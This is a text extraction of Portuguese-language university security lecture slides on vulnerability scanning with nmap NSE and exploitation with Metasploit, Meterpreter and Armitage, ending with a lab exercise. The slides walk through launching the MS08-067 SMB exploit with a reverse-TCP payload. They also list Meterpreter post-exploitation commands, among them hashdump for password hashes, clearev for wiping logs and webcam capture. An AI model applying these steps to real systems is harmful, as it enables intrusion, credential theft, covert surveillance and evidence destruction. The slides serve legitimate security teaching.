Baixe o app para aproveitar ainda mais
Prévia do material em texto
Segurança da Informação Aula 10 Prof. Lucas Exploração de falhas: exploits Ganho de Acesso Quebra de senha Exploração de falhas Introdução • Rápida revisão nmap • Nmap scripting engine: NSE • Quando implementado corretamente, o NSE permite que o nmap conclua uma série de tarefas, incluindo scanning de vulnerabilidades, descoberta avançada de rede, detecção de backdoors e, em alguns casos, até mesmo a realização de exploração de falhas Introdução nmap nse • NSE divide os scripts por categoria • auth • broadcast • brute • default • discovery • dos • exploit • external • fuzzer • intrusive • malware • safe • version • vuln https://nmap.org/book/nse-usage.html#nse-categories Introdução • NSE e seus scripts já estão incluídos no nmap • Para chamar o NSE, use o argumento --script seguido do nome da categoria ou do script e o endereço IP Exemplo • Pode-se utilizar toda uma família ou categoria de scripts usando o formato --script nome_categoria • nmap --script vuln 192.168.1.108 • O comando executa uma série de scripts que procura problemas conhecidos no sistema-alvo • Tipicamente disponibiliza um resultado somente quando uma vulnerabilidade é descoberta Outra ferramenta • Nessus (http://www.tenable.com/products/nessus/select-your-operating-system ) http://www.tenable.com/products/nessus/select-your-operating-system Exploração de falhas • De modo simplificado, a exploração de falhas corresponde ao processo de obter o controle sobre um sistema • Um exploit corresponde a uma maneira de passar por uma falha ou de desviar dos controles de segurança • Um exploit é a concretização, conversão ou a transformação de uma vulnerabilidade em uma arma • Resultado do scanning deve ser usado para ajudar a moldar, a focar e a direcionar os seus ataques O que é necessário para promover um ataque? Vulnerabilidade(s) AcessoPayload Metasploit • Frameworks para exploits • Estrutura formal para o desenvolvimento e o envio de exploits • Código aberto • Permite selecionar o alvo e escolher entre uma ampla variedade de payloads • Payloads são intercambiáveis e não estão associados a um exploit específico • Resposta à pergunta: “O que eu quero fazer agora que tenho o controle do equipamento?” • Adição de novos usuários, abertura de backdoors e a instalação de novos softwares (mais populares) Payload é relacionado a: • Carga de efeito de um ataque que foi entregue a um alvo Metasploit • Metasploit é diferente de um scan de vulnerabilidades • Metasploit: executar realmente uma exploração de falhas • Scan: procuram e informam pontos fracos em potencial Metasploit • http://www.metasploit.com/ • Comandos msfconsole msfupdate http://www.metasploit.com/ Metasploit • Não é uma prática legal sair disparando exploits aleatoriamente contra uma alvo (na expectativa de algum funcionar) • O ideal é efetuar uma correspondência entre as vulnerabilidades e os exploits Realizando o ataque • Descoberta as vulnerabilidades, procurar com o comando search qualquer exploit associado à descoberta • msfconsole Realizando o ataque • Rank 1. Manual (manual) 2. Low (baixo) 3. Average (médio) 4. Normal (normal) 5. Good (bom) 6. Great (ótimo) 7. Excellent (excelente) • Quanto mais alto a classificação, maior será a chance de sucesso e menor a probabilidade de desestruturar o sistema-alvo Realizando o ataque • use exploit/windows/smb/ms08_067_netapi Realizando o ataque • show payloads (verificar payloads disponíveis) Realizando o ataque • set payload windows/vncinject/reverse_tcp Realizando o ataque • show options (configuração do payload) Realizando o ataque • Configurar as variáveis RHOST e LHOST (remoto e local) exploit: iniciar o ataque! Realizando o ataque Resumo • msfconsole • search <número do path ausente> • use <nome e path do exploit> • show payloads • set payload <path do payload> • show options • set <nome da opção> <valor da opção> • exploit Payload meterpreter • Payload disponível no Metasploit que disponibiliza um shell de comandos que pode ser usado para interagir com os alvos • Comandos • cat • download • upload • upload arquivo c:\\windows\\system32 • edit • execute • kill • cd, ls, ps, shutdown, mkdir, pwd, ifconfig • hashdump (*crak de senha remoto – testar este comando) • clearev – limpa o log • idletime – mostra quanto tempo a vítima está ociosa • webcam_list – mostra a webcam (se disponível) • webcam_snap –i 1 –v false • lpwd – saber o diretório da origem (caso faça um upload ou download) • lcd • execute –f cmd.exe –i –H https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/ https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/ Realizando o ataque meterpreter Comando hashdump Carregando um exploit • Ache o exploit • https://www.exploit-db.com/ • Salve dentro do diretório: • /usr/share/metasploit-framework/modules/exploits • OU • /root/.msf4 (diretório para exploits pessoais – melhor organização) https://www.exploit-db.com/ Metasploit + scan • Excelente ferramenta baseado em GUI com ferramentas de scan+metasploit • apt-get install armitage • service postgresql start • service metasploit start • No kali, já vem instalado! Armitage Antes de executar o armitage, execute o seguinte comando: msfdb init (apenas uma vez) Armitage Armitage Armitage Armitage Armitage Exercícios 1-Realize o ataque no metasploit utilizando o payload meterpreter. Envie um print pelo moodle Segurança da Informação Exploração de falhas: exploits Introdução Introdução nmap nse Introdução (2) Exemplo (2) Outra ferramenta Exploração de falhas O que é necessário para promover um ataque? Metasploit Payload é relacionado a: Metasploit (2) Metasploit (3) Metasploit (4) Realizando o ataque Realizando o ataque (2) Realizando o ataque (3) Realizando o ataque (4) Realizando o ataque (5) Realizando o ataque (6) Realizando o ataque (7) Realizando o ataque (8) Resumo Payload meterpreter Realizando o ataque meterpreter Comando hashdump Carregando um exploit Slide 28 Metasploit + scan Armitage Armitage (2) Armitage (3) Armitage (4) Armitage (5) Armitage (6) Exercícios
Compartilhar